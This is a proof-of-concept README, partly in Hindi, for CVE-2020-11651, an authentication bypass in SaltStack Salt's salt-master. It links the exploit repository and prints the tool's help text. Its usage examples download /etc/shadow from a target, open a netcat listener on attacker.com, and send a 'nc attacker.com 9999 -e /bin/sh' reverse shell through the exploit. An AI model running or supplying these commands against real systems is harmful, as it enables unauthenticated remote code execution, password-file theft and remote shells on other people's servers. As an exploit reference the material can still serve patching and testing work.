
CVE-2020-11651: अवधारणा का प्रमाण
SaltStack Salt के 2019.2.4 से पहले और 3000 के 3000.2 से पहले के संस्करणों में एक समस्या पाई गई। salt-master प्रक्रिया का ClearFuncs वर्ग मेथड कॉल को उचित रूप से मान्य नहीं करता। इससे एक दूरस्थ उपयोक्ता बिना प्रमाणीकरण के कुछ मेथड्स तक पहुँच सकता है। इन मेथड्स का उपयोग salt master से उपयोक्ता टोकन प्राप्त करने और/या salt minions पर मनमानी कमांड चलाने के लिए किया जा सकता है।
पैच असमर्थित salt संस्करणों के लिए
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]
CVE-2020-11651 PoC
optional arguments:
-h, --help show this help message and exit
--host HOST, -t HOST
--port PORT, -p PORT
--execute COMMAND, -e COMMAND
Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
--upload src dest, -u src dest
Upload a file
--download src dest, -d src dest
Download a file
--minions Send command to all minions on master
--quiet, -q Enable quiet/silent mode
--fetch-key-only Only fetch the key
./PoC.py --host target.com --download /etc/shadow ./shadow
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""
./PoC.py --host target.com --fetch-key-only